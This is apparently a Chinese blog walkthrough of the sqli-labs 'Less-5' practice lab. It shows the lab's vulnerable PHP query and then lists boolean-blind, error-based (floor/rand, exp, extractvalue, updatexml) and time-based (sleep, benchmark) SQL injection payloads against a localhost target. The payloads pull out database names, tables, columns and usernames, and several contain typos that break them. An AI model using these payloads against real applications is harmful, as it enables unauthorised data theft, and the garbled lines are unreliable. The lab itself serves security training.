文章目錄
Less-5
簡單的源碼分析一下
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; //單引號閉合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//如果語句正確返回界面正常,否則返回錯誤.沒有返回數據的地方
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
利用函數邏輯來判斷
注:以下都是利用二分法進行判斷
判斷數據庫版本號第一位是否爲5(已知版本號爲5)
http://127.0.0.1/Less-5/index.php?id=1'and left(version(),1)=5--+
//如果是則返回頁面正確,否則頁面錯誤
判斷數據庫長度
http://127.0.0.1/Less-5/index.php?id=1'and length(database())=8--+
判斷數據庫第一個字母是否大於a
http://127.0.0.1/Less-5/index.php?id=1' and left(database(),1)>'a'--+
判斷數據庫前二個字母
http://127.0.0.1/Less-5/index.php?id=1'and left(database(),2)>'sa'--+
利用substr()和ascii()進行注入
ascii(substr((select table_name from infromation_schema.tables where tables_schema=database() limit 0,1),1,1))=101
獲取第二位字符直接substr(string,2,1)就好了
獲取第二個表,直接limit 0,1 --> limit 1,1就好了
利用regexp來後去users表中的列
http://127.0.0.1/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)-- +
選擇users表中的列名是否有us**的列
http://127.0.0.1/Less-5/index.php?id=1' and 1=(select 1 from infromation_schema.columns where table_name='users' and column_name regexp'^username' limit 0,1)-- +
利用ord()和mid()函數
http://127.0.0.1/Less-5/index.php?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1)1,1))=68
報錯注入
``http://127.0.0.1/Less-5/?id=1’union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+`
double 數值類型超出範圍
``http://127.0.0.1/Less-5/?id=1’union select (exp(~(select * from (select user())a))),2,3–+`
bigint 溢出報錯
``http://127.0.0.1/Less-5/?id=1’union select (!(select * from (select user())x) - ~0),2,3–+`
xpath函數報錯
``http://127.0.0.1/Less-5/?id=1’and extractvalue(1,concat(0x7e,(select @@version),0x7e))–+`
``http://127.0.0.1/Less-5/?id=1’and updatexml(1,concat(0x7e,(select @@version),0x7e),1)–+`
利用數據的重複性
``http://127.0.0.1/Less-5/?id=1’union select 1,2,3 from (select name const(version(),1),name const(version(),1))x–+`
延時注入
``http://127.0.0.1/Less-5/?id=1’and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+`
錯誤的時候會有5秒的延遲
benchmark()延時
``http://127.0.0.1/Less-5/?id=1’union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode(‘msg’,‘by 5 seconds’)),null)),2,3 from (select database()as current)as tb1–+`
當結果正確的時候,運行encode(‘msg’,‘by 5 seconds’)操作5000000次會佔用一段時間
個人自建博客:
http://pigdaqiang.top
簡書:
https://www.jianshu.com/p/3cefb0134f89